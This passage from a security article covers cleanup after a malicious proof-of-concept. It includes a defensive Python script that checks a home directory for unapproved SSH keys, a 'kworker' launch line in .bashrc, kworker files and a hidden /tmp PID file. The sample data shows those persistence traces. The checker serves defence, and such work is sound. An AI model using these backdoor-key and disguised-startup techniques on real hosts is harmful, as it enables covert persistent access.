Therefore, it is crucial to take immediate action, including removing unauthorized SSH keys, deleting the “kworker” file, removing the kworker path from the “bashrc” file, and checking for potential threats in “/tmp/.iCE-unix.pid.”
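The four remediation steps above translate directly into a host check. The following added example (written for this page; it is not Uptycs’ tooling and reproduces none of the malicious PoC) implements that check as functions that can be run against constructed sample files offline or pointed at a real home directory: it reports authorized_keys entries whose key material is not in an approved set, .bashrc lines referencing a kworker path, files literally named kworker under the home directory, and whether the /tmp/.iCE-unix.pid file quoted in the report exists. The sample keys and bashrc lines are made up; the assumption that the bashrc modification can be found by a plain substring match on “kworker” is mine, since the report does not show the exact line.

```python
import os
from pathlib import Path

# Paths quoted from the Uptycs write-up discussed above.
SUSPICIOUS_PID_FILE = "/tmp/.iCE-unix.pid"
BASHRC_MARKER = "kworker"          # assumption: the persistence line contains this path component

# Key-type prefixes recognised in authorized_keys (options such as no-pty may precede them).
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-", "sk-ssh-", "sk-ecdsa-")


def key_blob(line: str):
    """Return the base64 key material of one authorized_keys line, or None if none is found."""
    parts = line.split()
    for i, part in enumerate(parts):
        if part.startswith(KEY_TYPES) and i + 1 < len(parts):
            return parts[i + 1]
    return None


def unknown_ssh_keys(text: str, approved_blobs: set) -> list:
    """Lines of authorized_keys whose key material is not in the approved set."""
    unknown = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        blob = key_blob(line)
        if blob is None or blob not in approved_blobs:
            unknown.append(line)
    return unknown


def bashrc_kworker_lines(text: str) -> list:
    """Non-comment .bashrc lines that mention the kworker path."""
    return [
        line for line in text.splitlines()
        if BASHRC_MARKER in line and not line.lstrip().startswith("#")
    ]


def audit_home(home: Path, approved_blobs: set) -> dict:
    """Run every check against a real home directory and return the findings."""
    findings = {}
    ak = home / ".ssh" / "authorized_keys"
    if ak.is_file():
        findings["unknown_ssh_keys"] = unknown_ssh_keys(ak.read_text(), approved_blobs)
    rc = home / ".bashrc"
    if rc.is_file():
        findings["bashrc_kworker"] = bashrc_kworker_lines(rc.read_text())
    findings["kworker_files"] = [str(p) for p in home.rglob("kworker") if p.is_file()]
    findings["pid_file_present"] = os.path.exists(SUSPICIOUS_PID_FILE)
    return findings


# Constructed sample data so the checks can be exercised without touching a live system.
SAMPLE_AUTHORIZED_KEYS = """# approved team keys
ssh-ed25519 AAAAC3approvedkeyblob alice@workstation
no-pty,command="/usr/bin/backup" ssh-rsa AAAAB3approvedbackup backup@host
ssh-ed25519 AAAAC3unknownblob root@unknown
"""
APPROVED_BLOBS = {"AAAAC3approvedkeyblob", "AAAAB3approvedbackup"}
SAMPLE_BASHRC = "export PATH=$PATH:/usr/local/bin\n/home/user/.local/kworker &\n# kworker note\n"

if __name__ == "__main__":
    print("unknown keys:", unknown_ssh_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED_BLOBS))
    print("bashrc lines:", bashrc_kworker_lines(SAMPLE_BASHRC))
    print(audit_home(Path.home(), APPROVED_BLOBS))
```

The approved set should come from your own key inventory rather than from the machine being checked; a host that has already been compromised is not a trustworthy source for what “known” means.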
Differentiating between legitimate and malicious PoCs can be challenging and security researchers are encouraged to adopt safe practices, such as conducting testing in isolated environments like virtual machines, to enhance protection against these evolving cybersecurity risks.